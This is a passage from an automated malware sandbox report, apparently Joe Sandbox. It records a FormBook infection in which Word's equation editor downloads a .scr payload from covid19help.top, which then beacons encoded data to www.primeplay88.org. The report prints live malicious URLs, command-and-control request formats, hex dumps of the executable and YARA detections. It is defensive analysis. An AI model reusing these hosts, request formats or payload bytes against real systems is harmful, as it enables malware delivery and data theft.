                                                                                        Data Raw: 66 36 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 51 78 2f 70 47 4c 45 46 53 78 6f 69 36 38 37 5a 2f 54 6b 45 6d 54 57 6e 59 57 4d 55 4f 66 31 67 50 4b 69 4d 74 48 76 4f 62 57 71 65 49 76 70 6a 72 31 59 74 41 43 69 34 58 51 38 67 47 63 62 57 47 35 71 32 50 4c 77 78 6d 6c 31 64 61 48 62 77 31 52 59 65 30 2b 31 68 4f 76 37 47 54 53 6a 76 52 45 64 4c 48 37 7a 47 74 32 59 42 38 72 35 34 4d 4c 54 64 69 4e 44 4a 30 52 68 7a 44 6d 7a 49 2b 42 7a 39 6a 71 43 2b 4b 77 45 45 55 77 7a 4e 65 35 47 6f 43 45 2b 30 51 47 55 46 4e 63 75 76 32 70 78 58 7a 7a 6f 34 7a 77 70 7a 6b 34 34 55 70 46 7a 39 4e 41 3d 3d
                                                                                        Data Ascii: f6=jDXqObkiEjBYQx/pGLEFSxoi687Z/TkEmTWnYWMUOf1gPKiMtHvObWqeIvpjr1YtACi4XQ8gGcbWG5q2PLwxml1daHbw1RYe0+1hOv7GTSjvREdLH7zGt2YB8r54MLTdiNDJ0RhzDmzI+Bz9jqC+KwEEUwzNe5GoCE+0QGUFNcuv2pxXzzo4zwpzk44UpFz9NA==
                                                                                        May 14, 2024 09:38:03.294264078 CEST208INHTTP/1.1 403 Forbidden
                                                                                        content-length: 93
                                                                                        cache-control: no-cache
                                                                                        content-type: text/html
                                                                                        connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.224917691.195.240.19802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:38:05.824547052 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Length: 3623
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: www.primeplay88.org
                                                                                        Origin: http://www.primeplay88.org
                                                                                        Referer: http://www.primeplay88.org/ufuh/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        Data Raw: 66 36 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 52 56 37 70 45 6f 73 46 58 52 6f 6c 30 63 37 5a 78 7a 6b 66 6d 54 4b 6e 59 53 55 45 50 73 5a 67 4f 64 6d 4d 74 6c 33 4f 4c 6d 71 65 4b 76 70 76 30 6c 5a 6f 41 43 32 53 58 51 4d 61 47 65 33 57 47 59 36 32 4e 4e 4d 77 74 31 31 54 65 48 62 33 31 52 59 78 30 2b 6c 6c 4f 76 75 52 54 54 48 76 57 32 46 4c 50 72 7a 42 6f 32 59 42 38 72 35 43 4d 4c 54 39 69 4e 62 52 30 51 34 30 44 78 4c 49 37 52 54 39 69 4a 71 39 4d 77 45 41 61 51 79 39 61 36 6a 32 49 53 6a 39 63 55 45 38 54 4f 57 70 30 65 4e 6c 72 56 6f 78 6c 41 52 48 6d 50 56 77 67 6c 43 79 65 70 54 6b 75 6b 56 45 52 47 43 56 31 54 2f 37 48 61 4e 56 4c 57 44 41 4f 6f 75 6d 37 4e 6e 33 43 71 6c 65 61 6b 79 72 53 54 69 53 2f 38 79 77 6a 77 32 76 34 62 31 4e 71 52 47 72 46 54 5a 6f 73 65 62 79 78 38 50 74 4f 43 61 2f 4a 74 54 68 74 4f 66 78 4a 74 64 6a 6e 6a 73 36 79 47 4d 4e 77 73 6d 65 77 42 68 51 7a 30 51 51 41 6d 64 63 77 38 76 68 4f 68 6b 63 31 4b 7a 6c 37 37 52 73 42 6a 36 45 48 32 31 41 79 57 67 41 36 76 59 [TRUNCATED]
                                                                                        Data Ascii: f6=jDXqObkiEjBYRV7pEosFXRol0c7ZxzkfmTKnYSUEPsZgOdmMtl3OLmqeKvpv0lZoAC2SXQMaGe3WGY62NNMwt11TeHb31RYx0+llOvuRTTHvW2FLPrzBo2YB8r5CMLT9iNbR0Q40DxLI7RT9iJq9MwEAaQy9a6j2ISj9cUE8TOWp0eNlrVoxlARHmPVwglCyepTkukVERGCV1T/7HaNVLWDAOoum7Nn3CqleakyrSTiS/8ywjw2v4b1NqRGrFTZosebyx8PtOCa/JtThtOfxJtdjnjs6yGMNwsmewBhQz0QQAmdcw8vhOhkc1Kzl77RsBj6EH21AyWgA6vYoJu50P5/kfBCzQ+0Clo+1dOqQBOdd04lx1lmsV48IcrfrXl84tSb0U/odDQ/fNCNwTlcZz3uP3MuDz7ldo+i9Wcf4vuDawGhlLOybjsOKtlbj0jvZZEMy31hGJiQ4tAtf70meymUkBMIK6RT1YbjKZIoA1vrgb8uhVkMLmDmUIiXe0B4dY9rSymxVU5M7T24rFBwoetbBMLEQrxz8XEEORcIMrDVJVHsp8vnHF0S5QkWn9rS6hyYtBowlpuHRJRIB8/2wAXDS5kPUxSS1GPgMnUlKauNerih/1+ZWcKpwa4GaJmQX9TdulT38zy/BYSzLeN02tjZ0MUtykKaKC5jgVvV3/TjKqUgML2A5QkVmbnbuiatp4D3SQi2LTf7DVDh+wgCtomAkDWUBYaao3SKNDgDthhvPchHBbjBTUkU1fBGPH7nHXknWfvqkyAgcmFodOCOv+1nTqs0fWqiRzICevRWI95LweZDfMcS95FqzXsvoh5AaBTLMoU6XO09zEqI1nVLJHslLnBxn8rlu8h6cSF75pyHmJomF/mb9iU7sJT62xEKSDqanVyvqZ1D4kOOPiCqe74tdkJkp2LXG7L2kWZt2YS3h9zwEvpmF2RA8jI3ErA1VHFr6JAx8AQWjTYrj67uOtt1QpndDJ7nhm4yUe7iQXsEJ4AvhO [TRUNCATED]
                                                                                        May 14, 2024 09:38:06.126132965 CEST208INHTTP/1.1 403 Forbidden
                                                                                        content-length: 93
                                                                                        cache-control: no-cache
                                                                                        content-type: text/html
                                                                                        connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                                                                                        May 14, 2024 09:38:06.126141071 CEST1576OUTData Raw: 73 43 59 39 77 45 57 50 37 59 4f 31 50 41 50 6d 64 6c 4c 5a 54 58 6a 78 6b 63 34 71 30 64 59 53 35 67 64 4c 6e 37 75 66 52 59 2b 6a 53 4f 76 74 50 69 72 41 63 76 4c 5a 70 37 68 2f 48 42 42 56 4c 6b 52 78 4c 6e 55 41 50 73 72 4b 55 45 44 48 78 71
                                                                                        Data Ascii: sCY9wEWP7YO1PAPmdlLZTXjxkc4q0dYS5gdLn7ufRY+jSOvtPirAcvLZp7h/HBBVLkRxLnUAPsrKUEDHxq5fLGUo1vZwv0wgJnN7odEuhc8h3Oo1SwFQg28tvVdVcaHMFrjzV1j+az/XBqloyR1kTxl8H8wDElz7AjssQLF6KkG4dqVph872eCGUJOCAHtgZQeF3770DypzG586wAu1AD877p5kBN219ac203+lLxFjsBFzRtqF


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.224917791.195.240.19802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:38:13.513349056 CEST463OUTGET /ufuh/?f6=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&kjBDU=ZblXcjBhG HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Connection: close
                                                                                        Host: www.primeplay88.org
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        May 14, 2024 09:38:13.811152935 CEST208INHTTP/1.1 403 Forbidden
                                                                                        content-length: 93
                                                                                        cache-control: no-cache
                                                                                        content-type: text/html
                                                                                        connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.2249163172.67.175.2224432396C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-14 07:36:06 UTC311OUTGET /opszx.scr HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                        Host: covid19help.top
                                                                                        Connection: Keep-Alive
                                                                                        2024-05-14 07:36:07 UTC775INHTTP/1.1 200 OK
                                                                                        Date: Tue, 14 May 2024 07:36:07 GMT
                                                                                        Content-Type: application/x-silverlight
                                                                                        Content-Length: 744448
                                                                                        Connection: close
                                                                                        Last-Modified: Tue, 14 May 2024 00:28:14 GMT
                                                                                        ETag: "b5c00-6185f13d7bd37"
                                                                                        Accept-Ranges: bytes
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iVJ%2B0BKIFVeS6NXco%2Fn%2BfHqppJxrAv3vGco%2BgDUNpR9MoD9q4YfNDa5%2B8O8r27mnYW5O95wU1dfilY6n7CZCpSFU1z5tmTci78kFghvQR4%2FKgvgpKZ1B6ph%2BTB5VzkSGfWM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8839372498500fef-LAX
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-05-14 07:36:07 UTC1369INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bd d8 5c f4 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 50 0b 00 00 0a 00 00 00 00 00 00 8e 6f 0b 00 00 20 00 00 00 80 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL\0Po @ @
                                                                                        2024-05-14 07:36:07 UTC1369INData Raw: 00 00 06 04 28 1c 04 00 06 2a 76 02 72 7b 01 00 70 28 05 00 00 2b 02 d0 1c 00 00 1b 28 3a 00 00 0a 03 28 48 00 00 06 2a 1e 02 28 39 00 00 0a 2a 32 02 7b 57 00 00 0a 8c 23 00 00 1b 2a 2e 73 4d 00 00 06 80 15 00 00 04 2a 1e 03 28 34 00 00 06 2a 66 02 28 58 00 00 0a 03 72 9f 01 00 70 28 06 00 00 2b 02 03 7d 17 00 00 04 2a 66 02 28 39 00 00 0a 03 72 cb 01 00 70 28 12 00 00 2b 02 03 7d 18 00 00 04 2a 32 02 7b 18 00 00 04 6f 62 00 00 0a 2a 32 02 7b 18 00 00 04 6f ff 00 00 06 2a c2 03 28 15 00 00 2b 03 7e 19 00 00 04 28 67 00 00 0a 02 25 2d 06 26 7e 68 00 00 0a d0 87 00 00 01 28 3a 00 00 0a 28 69 00 00 0a 28 6a 00 00 0a 2a aa 02 28 17 00 00 2b 03 28 15 00 00 2b 19 03 72 0f 01 00 70 28 5a 00 00 06 03 02 72 0f 01 00 70 28 5c 00 00 06 28 70 00 00 0a 2a b2 02 03 28
                                                                                        Data Ascii: (*vr{p(+(:(H*(9*2{W#*.sM*(4*f(Xrp(+}*f(9rp(+}*2{ob*2{o*(+~(g%-&~h(:(i(j*(+(+rp(Zrp(\(p*(
                                                                                        2024-05-14 07:36:07 UTC1369INData Raw: 00 06 73 a7 00 00 0a 2a 5e 02 28 2a 00 00 2b 02 6f 4c 00 00 0a 6f a9 00 00 0a 73 aa 00 00 0a 2a 5a 02 03 04 28 27 00 00 2b 02 03 04 28 ba 00 00 06 73 fa 00 00 06 2a b2 02 28 42 06 00 06 03 28 11 00 00 2b 28 7d 00 00 0a 28 17 07 00 06 17 8d 01 00 00 01 25 16 03 a2 28 7e 00 00 0a 02 73 a8 00 00 0a 2a 72 02 28 39 00 00 0a 03 2d 0b 72 bf 03 00 70 73 ac 00 00 0a 7a 02 03 7d ad 00 00 0a 2a 3e 02 03 28 b2 00 00 0a 02 04 7d b3 00 00 0a 2a 1e 02 7b b3 00 00 0a 2a 56 02 28 39 00 00 0a 02 03 7d b4 00 00 0a 02 04 7d b5 00 00 0a 2a 1e 02 7b b4 00 00 0a 2a 52 02 7b b5 00 00 0a 2c 0b 02 7b b5 00 00 0a 6f b6 00 00 0a 2a 1e 02 28 58 00 00 0a 2a 6a 02 2d 06 7e 3e 00 00 04 2a 02 75 43 00 00 1b 2c 02 02 2a 02 73 b7 00 00 0a 2a 46 16 73 b9 00 00 0a 73 b7 00 00 0a 80 3e 00 00
                                                                                        Data Ascii: s*^(*+oLos*Z('+(s*(B(+(}(%(~s*r(9-rpsz}*>(}*{*V(9}}*{*R{,{o*(X*j-~>*uC,*s*Fss>
                                                                                        2024-05-14 07:36:07 UTC1369INData Raw: 1e 02 7b 93 00 00 04 2a 22 02 03 7d 93 00 00 04 2a 32 02 28 48 01 00 06 2c 02 16 2a 17 2a 52 02 28 39 00 00 0a 03 28 11 00 00 2b 02 03 7d 9a 00 00 04 2a de d0 3e 00 00 02 28 3a 00 00 0a 72 e9 06 00 70 1f 34 28 a0 00 00 0a 80 98 00 00 04 d0 3e 00 00 02 28 3a 00 00 0a 72 31 07 00 70 1f 34 28 a0 00 00 0a 80 99 00 00 04 2a 66 17 8d 0a 00 00 01 25 16 d0 7b 00 00 02 28 3a 00 00 0a a2 80 9b 00 00 04 2a 32 02 7b 5e 01 00 0a 6f 01 00 00 0a 2a 2e 73 5f 01 00 0a 80 60 01 00 0a 2a 36 02 7b 9f 00 00 04 03 6f 61 01 00 0a 2a 4a 02 7b 62 01 00 0a 02 7b 63 01 00 0a 6f 3d 00 00 2b 2a 4a 02 7b 64 01 00 0a 02 7b 65 01 00 0a 6f 3d 00 00 2b 2a c2 02 28 65 01 00 06 7e a7 00 00 04 25 2d 17 26 7e a6 00 00 04 fe 06 76 01 00 06 73 6a 01 00 0a 25 80 a7 00 00 04 28 3e 00 00 2b 28 3f
                                                                                        Data Ascii: {*"}*2(H,**R(9(+}*>(:rp4(>(:r1p4(*f%{(:*2{^o*.s_`*6{oa*J{b{co=+*J{d{eo=+*(e~%-&~vsj%(>+(?
                                                                                        2024-05-14 07:36:07 UTC1369INData Raw: 00 04 2a 7e 02 28 e8 01 00 06 2c 0e 02 03 04 74 3b 00 00 01 28 eb 01 00 06 2a 02 03 04 28 e9 01 00 06 2a ba 02 28 da 01 00 06 6f 3b 03 00 06 18 2e 02 16 2a 02 7b d8 00 00 04 6f 93 02 00 06 2c 0f 02 28 db 01 00 06 6f f1 01 00 06 2c 02 16 2a 17 2a 56 7e e2 00 00 04 25 2d 06 26 73 b7 01 00 0a 25 80 e2 00 00 04 2a 1e 02 7b de 00 00 04 2a 1e 02 7b e3 00 00 04 2a 22 02 03 7d e3 00 00 04 2a 1e 02 7b dd 00 00 04 2a 1e 02 7b e4 00 00 04 2a 22 02 03 7d e4 00 00 04 2a 1e 02 7b df 00 00 04 2a 56 02 7b e1 00 00 04 16 fe 01 28 43 06 00 06 02 7b e0 00 00 04 2a 1e 02 7b e5 00 00 04 2a 22 02 03 7d e5 00 00 04 2a 8e 02 03 28 20 07 00 06 28 f3 01 00 06 02 28 f2 01 00 06 14 28 8a 00 00 0a 2c 07 02 28 f2 01 00 06 2a 03 2a a6 02 28 11 00 00 2b 03 28 11 00 00 2b 03 6f 3b 01 00
                                                                                        Data Ascii: *~(,t;(*(*(o;.*{o,(o,**V~%-&s%*{*{*"}*{*{*"}*{*V{(C{*{*"}*( (((,(**(+(+o;
                                                                                        2024-05-14 07:36:07 UTC1369INData Raw: 02 7b 0a 01 00 04 6f db 01 00 0a 2a 3e 1f fe 73 7b 02 00 06 25 02 7d 13 01 00 04 2a 3e 1f fe 73 84 02 00 06 25 02 7d 18 01 00 04 2a 32 02 28 6e 02 00 06 28 86 06 00 06 2a 1e 02 7b 0b 01 00 04 2a 2e 73 79 02 00 06 80 0e 01 00 04 2a 46 03 6f 91 02 00 06 6f 8a 01 00 0a 6f dc 01 00 0a 2a 66 02 28 39 00 00 0a 02 03 7d 10 01 00 04 02 28 d7 01 00 0a 7d 12 01 00 04 2a 6e 02 15 7d 10 01 00 04 02 7b 14 01 00 04 2c 0b 02 7b 14 01 00 04 6f 01 00 00 0a 2a 1e 02 7b 11 01 00 04 2a 1e 02 28 82 02 00 06 2a 66 02 28 39 00 00 0a 02 03 7d 15 01 00 04 02 28 d7 01 00 0a 7d 17 01 00 04 2a 6e 02 15 7d 15 01 00 04 02 7b 19 01 00 04 2c 0b 02 7b 19 01 00 04 6f 01 00 00 0a 2a 1e 02 7b 16 01 00 04 2a 1e 02 28 8b 02 00 06 2a 42 02 03 14 28 2b 03 00 06 02 04 7d 1a 01 00 04 2a 56 02 7b
                                                                                        Data Ascii: {o*>s{%}*>s%}*2(n(*{*.sy*Fooo*f(9}(}*n}{,{o*{*(*f(9}(}*n}{,{o*{*(*B(+}*V{
                                                                                        2024-05-14 07:36:07 UTC1369INData Raw: 06 00 06 14 73 42 03 00 06 80 31 01 00 04 2a 66 02 28 39 00 00 0a 03 72 e1 0d 00 70 28 8c 00 00 2b 02 03 7d 33 01 00 04 2a 32 02 7b 33 01 00 04 6f 43 03 00 06 2a 32 02 7b 33 01 00 04 6f 44 03 00 06 2a 32 02 7b 33 01 00 04 6f 06 03 00 06 2a 1e 02 28 46 03 00 06 2a 1e 02 28 15 03 00 06 2a 1e 02 28 14 03 00 06 2a 4a 02 28 8d 00 00 2b 7d 34 01 00 04 02 28 35 03 00 06 2a fe 02 28 8d 00 00 2b 7d 34 01 00 04 02 03 0e 04 0e 05 0e 06 0e 08 28 38 03 00 06 03 72 d3 0c 00 70 28 70 06 00 06 02 04 7d 37 01 00 04 05 2c 07 02 05 7d 34 01 00 04 02 0e 07 7d 36 01 00 04 2a 1e 02 7b 37 01 00 04 2a 36 02 28 1b 03 00 06 02 7b 34 01 00 04 2a 1e 02 7b 36 01 00 04 2a ca 02 7b 35 01 00 04 2d 23 02 02 6f 39 03 00 06 02 6f 19 03 00 06 02 6f 1a 03 00 06 02 6f 1c 03 00 06 28 55 00 00
                                                                                        Data Ascii: sB1*f(9rp(+}3*2{3oC*2{3oD*2{3o*(F*(*(*J(+}4(5*(+}4(8rp(p}7,}4}6*{7*6({4*{6*{5-#o9ooo(U
                                                                                        2024-05-14 07:36:07 UTC1369INData Raw: 17 8d 82 00 00 02 25 16 02 7b 60 01 00 04 6f 25 03 00 06 a2 2a 1a 28 9e 00 00 2b 2a 32 02 7b 60 01 00 04 6f 25 03 00 06 2a 32 02 7b 60 01 00 04 6f 6d 03 00 06 2a 1e 02 73 74 03 00 06 2a 6a 02 28 e2 02 00 06 02 03 7d 61 01 00 04 02 03 6f 72 03 00 06 7d 62 01 00 04 2a 32 02 7b 61 01 00 04 6f f6 02 00 06 2a 32 02 7b 61 01 00 04 6f f7 02 00 06 2a 96 03 02 7b 61 01 00 04 6f 71 03 00 06 2e 0b 72 47 0c 00 70 28 c4 00 00 06 7a 02 7b 62 01 00 04 6f 27 03 00 06 2a 2e 72 47 0c 00 70 28 c5 00 00 06 7a 42 02 04 05 28 68 03 00 06 02 03 7d 63 01 00 04 2a 62 02 7b 63 01 00 04 02 28 6b 03 00 06 02 28 6c 03 00 06 73 94 03 00 06 2a 62 02 05 0e 04 28 68 03 00 06 02 03 7d 64 01 00 04 02 04 7d 65 01 00 04 2a 1e 02 73 7e 03 00 06 2a 66 02 73 39 00 00 0a 7d 69 01 00 04 02 28 21
                                                                                        Data Ascii: %{`o%*(+*2{`o%*2{`om*st*j(}aor}b*2{ao*2{ao*{aoq.rGp(z{bo'*.rGp(zB(h}c*b{c(k(ls*b(h}d}e*s~*fs9}i(!
                                                                                        2024-05-14 07:36:07 UTC1369INData Raw: a5 01 00 04 2c 07 02 73 da 03 00 06 2a 7e a6 01 00 04 2a 7e 02 7b a5 01 00 04 2c 11 02 7b a2 01 00 04 73 6b 06 00 06 8c fc 00 00 02 2a 7e a6 01 00 04 2a 7e 02 7b a5 01 00 04 2c 11 02 7b a2 01 00 04 73 6d 06 00 06 8c fd 00 00 02 2a 7e a6 01 00 04 2a 56 73 39 00 00 0a 80 a3 01 00 04 73 dd 03 00 06 80 a6 01 00 04 2a 82 02 28 39 00 00 0a 02 03 7d a7 01 00 04 02 16 7d a8 01 00 04 02 7b a7 01 00 04 6f d4 03 00 06 2a 6e 02 7c a8 01 00 04 17 16 28 a1 01 00 0a 2d 0b 02 7b a7 01 00 04 6f d5 03 00 06 2a 6e 02 28 16 03 00 06 03 28 51 00 00 2b 02 03 7d a9 01 00 04 02 14 7d aa 01 00 04 2a 32 02 7b a9 01 00 04 6f 39 03 00 06 2a 32 02 7b a9 01 00 04 6f 3b 03 00 06 2a 32 02 7b a9 01 00 04 6f 3c 03 00 06 2a 32 02 7b a9 01 00 04 6f 3d 03 00 06 2a 32 02 7b a9 01 00 04 6f 3e
                                                                                        Data Ascii: ,s*~*~{,{sk*~*~{,{sm*~*Vs9s*(9}}{o*n|(-{o*n((Q+}}*2{o9*2{o;*2{o<*2{o=*2{o>
                                                                                        2024-05-14 07:36:07 UTC902INData Raw: 70 28 bf 00 00 2b 05 72 f9 10 00 70 28 c0 00 00 2b 02 03 04 05 28 3a 04 00 06 2a 36 02 28 49 04 00 06 02 7b db 01 00 04 2a ee 02 28 49 04 00 06 02 7b da 01 00 04 2d 26 02 7e e0 01 00 04 25 2d 17 26 7e df 01 00 04 fe 06 4c 04 00 06 73 42 02 00 0a 25 80 e0 01 00 04 28 c2 00 00 2b 2a 02 7b da 01 00 04 2a 32 02 7b d9 01 00 04 6f f0 02 00 06 2a 4e 02 28 49 04 00 06 02 7b d9 01 00 04 03 6f eb 02 00 06 2a 22 02 04 6f 45 04 00 06 2a 22 02 04 6f 46 04 00 06 2a 4e 02 fe 13 7b dc 01 00 04 17 33 07 02 28 c2 00 00 06 7a 2a 2e 73 4b 04 00 06 80 df 01 00 04 2a 1e 03 6f f6 02 00 06 2a 66 02 28 39 00 00 0a 03 72 15 11 00 70 28 c4 00 00 2b 02 03 7d e1 01 00 04 2a 46 02 7b e1 01 00 04 6f ea 02 00 06 28 89 00 00 2b 2a 46 02 7b e1 01 00 04 6f 3d 04 00 06 28 c5 00 00 2b 2a 46
                                                                                        Data Ascii: p(+rp(+(:*6(I{*(I{-&~%-&~LsB%(+*{*2{o*N(I{o*"oE*"oF*N{3(z*.sK*o*f(9rp(+}*F{o(+*F{o=(+*F


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:09:36:02
                                                                                        Start date:14/05/2024
                                                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                        Imagebase:0x13fa90000
                                                                                        File size:1'423'704 bytes
                                                                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:09:36:03
                                                                                        Start date:14/05/2024
                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                        Imagebase:0x400000
                                                                                        File size:543'304 bytes
                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:09:36:07
                                                                                        Start date:14/05/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\op33779.scr
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\op33779.scr"
                                                                                        Imagebase:0x60000
                                                                                        File size:744'448 bytes
                                                                                        MD5 hash:E81883368313FC5B3CC4D1F1F1889827
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000005.00000002.355102505.0000000004030000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:09:36:08
                                                                                        Start date:14/05/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\op33779.scr
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\op33779.scr"
                                                                                        Imagebase:0x60000
                                                                                        File size:744'448 bytes
                                                                                        MD5 hash:E81883368313FC5B3CC4D1F1F1889827
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.401593026.00000000002A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.401593026.00000000002A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
